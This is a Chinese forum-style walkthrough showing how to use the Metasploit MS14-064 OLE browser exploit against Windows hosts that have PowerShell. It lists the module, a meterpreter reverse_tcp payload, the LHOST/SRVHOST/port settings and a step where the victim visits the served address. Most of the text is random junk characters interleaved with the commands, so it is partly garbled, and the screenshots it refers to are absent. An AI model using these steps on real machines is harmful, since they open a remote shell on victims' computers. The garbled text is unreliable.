+ e4 u( ^) t( H- y+ [, ]
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
$ E4 w1 w1 k# u0 B) {% w
: R" G8 [' U4 \8 E' b
/ M$ o7 k4 q- W' M 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
1 a- j+ M* H4 U5 \' v
7 V9 d7 |7 `- v* t
[6 `; v# z: \- j! a0 K7 b$ a 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
- [1 O& w/ {& Y4 T
7 Z8 J. s( X5 q( T8 W6 ]' j
) E# o% Q+ N! Z% T set AllowPowershellPrompt true
* z& L1 z5 W$ u% b$ D( N. q( ]( l" ~8 }
% V! _# n4 F; r5 i4 D4 }' v
7 g- B8 v: [2 r1 c Set LHOST 192.168.0.109
0 K# d/ C* \2 q4 J2 }0 z
3 t! Q: W3 _+ K$ c
6 D6 G; K1 E# Y2 ? set SRVHOST 192.168.0.109& y) t/ L3 x# T$ G
; w" @; i. r9 a9 b- z4 M
# u% J6 S& |( o; V
Set uripath share
" f% C8 d& G: e2 w \
l) L2 |& ?+ r s3 ?8 d5 N" V9 ~6 n
Set srvport 80+ @& Z8 H& o( {4 O
4 ^/ N3 U# o! U9 e
7 O; C D9 O$ j& i- t
# Y, j4 S* U9 `
+ b% D* a' T, y+ U. `3 i: l' Z+ e8 T+ ] w3 E5 u
3 d3 {' F# Y& t# Y' b4 n8 A; @. T
* w* o$ T, B e8 I/ Q
- P! z& K: z& |3 s
, m/ D8 k& T$ C E. P7 R% v
) B N- c/ X4 a6 c
3 L+ B( B, @( n) D' g8 z
0 b1 U6 [% P7 t0 N4 l" r
7 X/ X9 I, T) \! y
/ C' S& ]2 h. h ' [! T, S2 d& _7 `0 j- R4 Q
" I- s+ U* g" u/ R' k0 t+ M0 q9 e: k( W( c% {5 [% ~6 n
下面我们来访问本地地址如图:
1 a p0 X. F4 ]" t' ^* t
5 V) b7 ^7 H! ]3 B6 m1 I( K' J9 G' j( c' h
( O) a. S/ v; L
0 E# z& X9 g, C8 ]
+ ^3 @. s4 Q/ P6 ?6 B6 K
% W6 b3 t4 Y0 Y/ F, X
9 q3 F# }9 _7 F6 F7 ?
% H% D, k9 V) V& S ]/ y7 L
- ~& d2 t$ E, r8 ^